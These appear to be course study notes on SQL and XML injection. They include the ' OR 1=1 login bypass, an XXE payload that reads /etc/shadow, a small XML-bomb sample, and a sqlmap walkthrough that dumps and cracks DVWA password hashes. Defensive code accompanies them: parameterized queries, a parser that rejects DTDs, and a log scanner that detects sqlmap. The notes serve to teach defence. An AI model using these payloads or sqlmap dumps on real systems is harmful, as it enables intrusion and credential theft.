SQL and XML Injections
(OBJ 2.3 & 2.4)
Injection Attack
- Involves sending malicious data to a system for unintended consequences
- SQL injection and XML injection share the goal of inserting code into systems for malicious actions
SQL (Structured Query Language) Injection
SQL Data
- Used to interact with databases
- Databases use SQL as the way to read and write information
- Four main SQL actions
  - Select
    - Used to read data from the database
  - Insert
    - Used to write data into the database
  - Delete
    - Used to remove data from the database
  - Update
    - Used to overwrite some data in the database
- Select
  - Example statement:
    SELECT * FROM USERS WHERE userID = 'Jason' AND password = 'pass123';
  - This statement goes to the database, which then determines whether there is an exact match
  - If there is a match, access is granted
SQL Injection
- Involves inserting malicious SQL code into input fields
- Code Injection: The insertion of additional information or code through a data input form from a client to an application
- Attackers use URL parameters, form fields, cookies, POST data, or HTTP headers for SQL injection
- Prevention
  - Input validation
  - Sanitize user data
  - Use a web application firewall
    - Will perform input sanitization and input validation for you even if you can't rewrite the application's code itself
- SQL Injection Attempt
  - Involves statements like ' OR 1=1
  - Example
    - Original SQL statement:
      SELECT * FROM USERS WHERE userID = 'Jason' AND password = 'pass123';
    - Injected SQL statement (with ' OR 1=1 entered as the password):
      SELECT * FROM Users WHERE userID = 'Jason' AND password = '' OR 1=1;
    - Access will be granted; you just performed an SQL injection
    - The ' acts as an escape character that closes the password string, so the system ends up evaluating: was the entered password a match for Jason's password, OR does 1=1? Since 1=1 is always a true statement, access is always granted (see Ch. 1.1 Propositional Logic)
    - This is the kind of input that input validation is meant to catch
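To see why the ' OR 1=1 trick works and how a parameterized query (the standard fix alongside input validation) stops it, here is an added example that is not from the course or these notes; it uses Python's built-in sqlite3 with a constructed users table. It uses the quote-balanced form ' OR '1'='1 so the injected statement still parses, since the notes' version leaves the trailing quote unmatched.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the notes' USERS table: one account, Jason / pass123.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userID TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('Jason', 'pass123')")
    return con


def build_vulnerable_query(user, pw):
    # The input is pasted straight into the SQL text, so a quote in the input
    # closes the string literal and whatever follows becomes SQL syntax.
    return f"SELECT * FROM users WHERE userID = '{user}' AND password = '{pw}'"


def login_vulnerable(con, user, pw):
    # AND binds tighter than OR, so "... AND password = '' OR '1'='1'" is
    # (userID match AND empty password) OR true, which always returns the row.
    return con.execute(build_vulnerable_query(user, pw)).fetchone() is not None


def login_parameterized(con, user, pw):
    # Placeholders bind the input as data: the query structure is fixed before
    # any user-controlled bytes are seen, so ' OR '1'='1 is just a wrong password.
    sql = "SELECT * FROM users WHERE userID = ? AND password = ?"
    return con.execute(sql, (user, pw)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"  # quote-balanced form of the notes' ' OR 1=1
    print(build_vulnerable_query("Jason", payload))
    print("vulnerable:", login_vulnerable(db, "Jason", payload))        # True
    print("parameterized:", login_parameterized(db, "Jason", payload))  # False
```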
XML (Extensible Markup Language) Injection
XML Data
- Used for data exchange in web applications
- Should be sent within an encrypted tunnel, like TLS
- Input validation and sanitization are crucial for protection
- If you submit XML data without encryption you are exposed to:
  - Snooping
  - Spoofing
  - Request forgery
  - Injection of arbitrary code
- Appears as tagged fields
- Example
    <?xml version="1.0" encoding="UTF-8"?>
    <question>
      <ID>SECURITY-002-0001</ID>
      <title>Is this an XML vulnerability?</title>
      <choice1>Option 1</choice1>
      <choice2>Option 2</choice2>
    </question>
  - Can be configured with whatever fields you want
  - There is nothing malicious in this example
XML Exploits
- XML Bomb (Billion Laughs Attack)
  - XML encodes entities that expand to exponential sizes
  - Consumes memory exponentially, acting like a denial-of-service attack
  - The nested entity pattern continues all the way down
  - Consumes up to 3 GB of memory (in this example)
- XXE (XML External Entity) Attack
  - Attempts to read local resources, like password hashes in the shadow file
  - Embeds a request for a local resource
  - Example
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE foo [
        <!ELEMENT foo ANY>
        <!ENTITY xxe SYSTEM "file:///etc/shadow">
      ]>
      <foo>Some data</foo>
    - This XML entity is trying to read the shadow file of a Linux machine, which contains password hashes for that system's accounts
Prevention
- Implement proper input validation
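One concrete form of that input validation, added here as an example that is not from the course or these notes: both the XML bomb and XXE need an entity declaration, and entities can only be declared inside a DOCTYPE, so a parser that refuses any DOCTYPE blocks both before anything is expanded or fetched. It uses Python's built-in expat bindings, the notes' own benign and XXE documents, and a constructed, deliberately tiny two-level bomb.

```python
import xml.parsers.expat


class DtdRejected(ValueError):
    """Raised when the document carries a DOCTYPE or entity declaration."""


def parse_without_dtd(xml_text):
    """Parse a tagged-field XML document into {tag: text}, refusing any DTD.
    The XML bomb and XXE both depend on <!ENTITY> declarations, which can only
    live inside a DOCTYPE, so refusing the DOCTYPE stops both attacks before
    any entity is expanded or any file: URL is fetched."""
    fields, stack = {}, []
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed")

    def reject_entity(name, *_):  # second line of defence, same rule
        raise DtdRejected(f"entity {name!r} is not allowed")

    def text(data):  # collect text under the element currently open
        if stack and data.strip():
            fields[stack[-1]] = fields.get(stack[-1], "") + data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = text
    parser.Parse(xml_text, True)
    return fields


def is_accepted(xml_text):
    """True if the document passes the no-DTD rule, False if it was rejected."""
    try:
        parse_without_dtd(xml_text)
        return True
    except DtdRejected:
        return False


# The notes' benign and XXE examples, plus a constructed two-level XML bomb
# (the real Billion Laughs nests about ten levels; this one is deliberately tiny).
BENIGN_XML = ('<?xml version="1.0" encoding="UTF-8"?><question><ID>SECURITY-002-0001</ID>'
              '<title>Is this an XML vulnerability?</title><choice1>Option 1</choice1>'
              '<choice2>Option 2</choice2></question>')
XXE_XML = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
           '<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>Some data</foo>')
BOMB_XML = ('<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;">]>'
            '<lolz>&lol2;&lol2;&lol2;&lol2;</lolz>')
```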
Exam Tip:
- Determine if a piece of code is HTML, JavaScript or XML
- If you see something like a 'Font', 'Image', 'Href', this is going to be HTML
- If you see something like 'question', 'ID', 'type', 'element', 'entity', this is going to be XML
Conducting an SQL Injection
- We first need an SQL injection vulnerable website or database
  - Look at Damn Vulnerable Web Application (DVWA)
  - Run it inside a Metasploitable 2 virtual machine
- Look at Burp Suite
  - We want to intercept the request the web app sends: stop it from going from the browser to the web server by routing it through the web proxy, then capture the data we need from it
  - Go to the 'Proxy' tab inside Burp Suite and turn Intercept on
  - Now configure your web browser to actually use that proxy
    - Go to 'Preferences'
    - Go to 'Advanced' -> 'Network' -> 'Settings'
    - Set up Manual Proxy Configuration
    - Use the localhost address 127.0.0.1 on port 8080
    - This tells the browser to use our Burp Suite tool
  - Now when we submit, we don't get the answer back in the web browser: the request never reaches the web server that would return that info; instead it goes to Burp Suite, which captures it
  - The captured request shows the security level and the PHPSESSID cookie
- Now we are going to use sqlmap
  Example using the sqlmap -u command:
  [user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=ab289a1ba9fe..."
  - Say Yes to the prompts; sqlmap starts querying the database, trying different injections
  - Now see everything we have found
  - Tells you info about our target
  Example using the sqlmap -u ... --dbs command:
  [user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=ab289a1ba9fe..." --dbs
  - Adding the --dbs flag at the end makes sqlmap go through and find what databases are on that server
  - Note it found 7 different databases
  Example using the sqlmap -u ... -D ... --tables command:
  [user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa --tables
  - To select a database on this server, use the -D flag and indicate the name of the database you want to select
  - Then add --tables to enumerate it and find out what tables exist inside that database
  - Finds two tables: 'guestbook' and 'users'
  Example using the sqlmap -u ... -D ... -T ... --columns command:
  [user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --columns
  - To dump the columns from a table, use the -T flag to indicate the table you want and then add --columns
  - We now have six columns: user, avatar, first_name, last_name, password, and user_id
  Example using the sqlmap -u ... -D ... -T ... --dump command:
  [user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --dump
  - To go a little further, take out --columns and put --dump in its place
  - It will grab any password hashes from the password column and attempt a dictionary attack to crack them
  - It will ask whether to use the standard dictionary (1) and whether to use common password suffixes (n)
  - We have our passwords!
  - This is the power of SQL Injection!
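The defender's side of the walkthrough above, added here as an example that is not from the course or these notes: a small scanner over Apache combined-format access-log lines that flags clients sending SQL tokens in the DVWA id parameter, or announcing themselves with sqlmap's default User-Agent prefix, and reports any client that does so repeatedly. The log lines, IP addresses, timestamps and threshold are all constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Tokens that never belong in a numeric id= value but show up in injection probing
# (quotes, comment markers, boolean/union keywords, time-delay functions).
SQLI_RE = re.compile(r"""('|"|--|/\*|\bor\b|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\()""", re.IGNORECASE)


def score_request(target, user_agent):
    """Return the reasons one request looks like SQL injection probing (empty list if none)."""
    reasons = []
    if user_agent.lower().startswith("sqlmap"):  # sqlmap's default User-Agent begins with "sqlmap/"
        reasons.append("sqlmap user-agent")
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SQLI_RE.search(value):  # parse_qsl has already URL-decoded %27 -> ' and %20 -> space
            reasons.append(f"SQL token in parameter {name!r}")
    return reasons


def find_sqli_sources(log_lines, threshold=3):
    """Map client IP -> list of (path, reasons) for clients with at least `threshold` suspicious hits."""
    hits = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _ts, _method, target, _status, ua = m.groups()
        reasons = score_request(target, ua)
        if reasons:
            hits[ip].append((urlsplit(target).path, reasons))
    return {ip: h for ip, h in hits.items() if len(h) >= threshold}


# Constructed sample: one normal visitor and one client running sqlmap against the DVWA page.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Jul/2025:23:01:43 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Jul/2025:23:06:48 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20OR%201%3D1&Submit=Submit HTTP/1.1" 200 5120 "-" "sqlmap/1.x"',
    '10.0.0.9 - - [13/Jul/2025:23:06:49 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%20UNION%20SELECT%201%2C2&Submit=Submit HTTP/1.1" 200 5200 "-" "sqlmap/1.x"',
    '10.0.0.9 - - [13/Jul/2025:23:06:50 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%20AND%20SLEEP(5)&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.x"',
    'garbage line that does not match the format',
]
```

Real traffic needs the token list tuned per parameter (a free-text search box legitimately contains "or"), so treat hits as a triage signal rather than a block rule.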